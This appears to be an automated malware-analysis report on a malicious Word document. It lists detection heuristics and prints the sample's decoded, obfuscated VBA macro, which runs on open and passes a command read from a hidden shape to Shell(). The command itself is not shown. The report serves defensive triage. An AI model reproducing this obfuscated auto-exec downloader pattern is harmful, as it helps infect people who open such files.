MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains a VBA macro with an autoopen subroutine that invokes cmd.exe with obfuscated arguments. This suggests an attempt to download and execute a secondary payload. The presence of a Shell() call and suspicious cmd.exe invocation points to a malicious downloader.
Heuristics 9
-
ClamAV: Doc.Malware.Dldk-6779378-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dldk-6779378-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
. _ Shell(TuVsYWzGVb, mBazcr), jiqpK) FznbikbSkGiwYhaFEmIlJw = JThRwjNCcTJEwtXijWNiC / Tan(197755194) * 272893850 / Tan(302319952) + pHZOrJfISiIBTdl - Cos(152461652) + (25668951 / Int(cOddMjDcPvOffd)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub autoopen() pjbmZm -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5467 bytes |
SHA-256: 01abdc3ae30b8c53713174f73c90f89fa625a6d995064acbf4532e1551747706 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
142 of 181 identifiers look randomly generated (e.g. 'risziEmwEdpWGcMlVGowvorv') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "sCJtiKrzIX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
pjbmZm
End Sub
Attribute VB_Name = "cXQwOdwwjbnIMD"
Function pjbmZm()
On Error Resume Next
UaOKwSDtNXWcmPinKlhHdR = sRhnkkYbqhXnWbGioDIHcWEr / Tan(189679605) * 38879204 / Tan(121208645) + fvoJDiWtRfTIpw - Cos(210039272) + (306837440 / Int(cHMECtDVJTWMqKiST))
Set vtOjrFNQJkzSfqKczzGAcBkn = KzhbUoqVAkBAtPGrlkSVqnf
NKjMTTtIaphFfp = wJzfFIcGhzIqRRRDWTfOKH
FLOumcGJRqENCRRXOKVRihw = KciAzNNjHvDawrOw / Tan(155682666) * 206048898 / Tan(89998048) + tBOklbkmYDMXODj - Cos(61838601) + (303240094 / Int(JEcUGGOqbWwXuDT))
Set QJOwOXcbLEifMtIFERVJdZv = WuANpBJJEXmauvs
bAJBYjihOrSdhKNrNHbTXO = JvYboGiKIYjicPujnPSzw
JuHtsDKsrtXzSzcOsROjFRR = flwdfJzMLMwCECpfqPIWK / Tan(320210200) * 80341525 / Tan(331692690) + wrOdGpsdaNHGhNhtKlFw - Cos(170558094) + (65780704 / Int(biqpIvWjYwAjRljFWGZipi))
Set ICbczKGzDmBmuPAjiDi = IjdQIbjjsAfAtJhmhSXYS
zwPzopWWqbLAQcYKUXiXHCGA = khOCPfFPKjhAJnqMWJEpttF
kIoNVLnPFkFCnDG = jHnJPtQlEzZHAFGj / Tan(61905209) * 300175983 / Tan(175003799) + DOiUdQGjOlEhzXBwOZtrsCI - Cos(144444533) + (252237224 / Int(OziWttdPJScTjwmjXSvs))
Set cEJUjAjwAFIhwCGE = sKEiOjTutuEMfpauXlvUBJt
QIMTljwjbiaknbOUqZqFfmV = inZQLkriRKRGXzIJw
CtiKEJCFSfCRTuzaOvvFsbj = CzVqvJsUfAikcOlZIozrWnmH / Tan(11659955) * 168072936 / Tan(27189649) + LbAaKkIEoMKJmimSMPzzJWz - Cos(26988345) + (200581333 / Int(bPMNoVFwJEAIZrGhkvioEoB))
Set vlbEkodwvSJsraYoDo = hREqFtclCZqnmOtSCtB
UaEMGiNpKWqkQPTB = vWKIDaWFfWiwIWuCbEHNrjX
HjkILwwZfmXhMjCbuZNkoE = HSLwiUlZXTXEIOEmfXDPBca / Tan(260357123) * 5005420 / Tan(32187363) + UzzlwCmdpAzOEuN - Cos(334850) + (98074211 / Int(iuNqmhMlprirYzdOQbZhYB))
Set kOmjJwVncLzWKrdLQZ = NuwzbBkqdlahPcZc
zBCnTECfZbTWmQJHLoa = QLiZIrCBijukPBLOXatqwS
StOjVJzcYqCaMOKJWEi = XMfoIiNvVEnSPEt / Tan(186443041) * 56803514 / Tan(51823574) + KYlrwjEMcJHAXzLBGNZX - Cos(286734865) + (318102284 / Int(GUCjLIViBOZTim))
Set hIERllNDQTECnOikmO = iXvwsEHbGlzjdPljRS
LQsRmQHFiTSinFLHzlL = MdKGRSnanChRRMCF
fOlLKzVzzGpCEhtV = vkYLmwUahzcDUqMQXmRApB / Tan(178708063) * 216696216 / Tan(44355982) + lldVjLhdNXowtSRldz - Cos(297872966) + (313384101 / Int(PdlhucUwuJrEPLizLSQW))
Set cocYtwjEXbnLrVIromjMfT = zudHjnSjcYomoJIB
luWhDtYpZFXjhKLJaiiP = zQFuLmCiThflFbkzjuAERJh
Set QTqVRZE = sCJtiKrzIX.Shapes(zqLoWcic + "qjuljvLMNkR" + ABphi).TextFrame
hPzDGQOVDbiwIF = FabpETukIAJlapKoYXmkA / Tan(29916536) * 7034727 / Tan(20648151) + zaoBHWkIIMmwJpkm - Cos(208508364) + (273558546 / Int(zfojsnFZWVkAZY))
Set FsGiAiYdRcXpPhBzUOwF = LuvOBzNmXMMafksfwpXZ
XDVzqrVXQlaTzt = LUwhKqtQKPjwJRXZbffnrZQL
VQwKbwiviBqocuthvMb = uQMPLMWYbqbaFqTfTDQl / Tan(187879928) * 67597035 / Tan(218989918) + wfQUGjlEsMjEEhwOaK - Cos(128845655) + (291650313 / Int(PjmbONsvqBkjqRjwBRv))
Set WitJPbmEBKRqovi = dtrSsICKwUNPSSYsXnDhpdMn
nufjtuuikSIZdMOfjNu = WljlZTBsAGAhErFO
wAkPimDDdRbhRw = jpwHTptwEzfOwa / Tan(163893644) * 29111877 / Tan(11217345) + wjciLqzEvfqjncrzC - Cos(204494982) + (49559982 / Int(HMECfSwYFdEMZPSOb))
Set iHHPuOIVJDWwXtwjKlfaDtra = SadKYJcXEAzKrSqtKIvBGFKQ
EjjAvkQjQcnfKltubTszZS = phslwZsMQNUTdsWJQj
TuVsYWzGVb = QTqVRZE.ContainingRange + znRGG + crpOKd + iGvMF + HalGiq + mcSbl + IAFPzv + RUKEPhE + JPPmSQk + YENvisz + FpzIzdN + vBVWhSmS
SDoOtQfqBTHiMW = kjWdzMGrmkvILqVoowEzSikr / Tan(37968811) * 274778523 / Tan(208410044) + HrKoohKLrFzsMMBdwHTzffT - Cos(224157839) + (53440172 / Int(dBvfXJjNjuaGTijJwiz))
Set lGjGtwWjNcYcjPDI = LhpLzcGDrnpTWikkw
WUpmZnAzGVwaEaXtkAHAmi = CBKjMquorkcjnaYICLz
sonuvXqIDwbHVLImrXGOkG = AnoWuQbsBBFrfXwKRwAlwJ / Tan(130654799) * 318940529 / Tan(36883308) + JOrhLDmznGGBvrb - Cos(42667981) + (167758932 / Int(PUdOtNpSjUqqTsQ))
Set HNBUqBEfkrDQAIJskOjkcv = irtTRJwnOkHkOFFPOQ
iBJZRbLzGFLfMMrXcwhmWnEp = tYumiwSUiQTUScsFLphC
ItNcwfTzrwPsahUYBtG = bIUdUCDlOwsKkvijkYZ / Tan(163408844) * 225888682 / Tan(211396052) + univREjovunzAZkHwciktEF - Cos(52193143) + (206182777 / Int(ondThrvOZpmGlj))
Set KwQwvdGAQdwzvApiaPNQs = bMvEmzuUprBCjHoL
ahmMqlrzOkGMqXQpzVEAq = GGvnFwsQitPjniGzkbDFXPn
Const mBazcr = 0
NaLojEihBHNGPkOdNuh = QGEsWfaJVCimoudrcBB / Tan(56101338) * 3696776 / Tan(340086287) + BrhpWLDTAcVJHWSREdUMwZa - Cos(121351399) + (138964236 / Int(WAMtYbQMCBpqDwR))
Set hKSkVVJjwifnvbQOUPpCH = EusvTRcOaWuPrQA
lArdwuvdQakaWoJPcaGYs = BsHiDJsjkAOjdoLdKJw
NIzTMiuCvpFcsbpBOBOPql = WZqXrXuYusiqpScNz / Tan(8071505) * 41931194 / Tan(110243293) + loDmDRbldCzbsauVG - Cos(20495157) + (200586655 / Int(QKkNkzjloPOjUz))
Set kmlnGSnRpfOzrhsswbPza = pBEiqzOoPHtpKjV
YjdtuiVBsDwWQIFAL = zjjYcqCAQHEBXJXiDjVj
fCpmB = Array(YHBtifllf, GmquROzqj, whEZiiVp, Interaction _
. _
Shell(TuVsYWzGVb, mBazcr), jiqpK)
FznbikbSkGiwYhaFEmIlJw = JThRwjNCcTJEwtXijWNiC / Tan(197755194) * 272893850 / Tan(302319952) + pHZOrJfISiIBTdl - Cos(152461652) + (25668951 / Int(cOddMjDcPvOffd))
Set KIZnokKiviPPhMscKwcMfd = vtKOuktnziOIUMjP
SkhzwRVPWTDjCRHhz = udWQuCrPlTEYPbiKuvvM
sFQERumnZMNHEqtqm = WzYJMTWNIpjwWq / Tan(12220826) * 185269109 / Tan(199253618) + VjOYCjSQwdPhTlO - Cos(196934794) + (101243300 / Int(risziEmwEdpWGcMlVGowvorv))
Set tzaVzhsbDkvOYzKlFf = acXnVhQIpQCDrzcpGMbGvz
CrQXzIiNqJCUrVJEojZDKAj = RvIDZiYtdhUvFKT
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.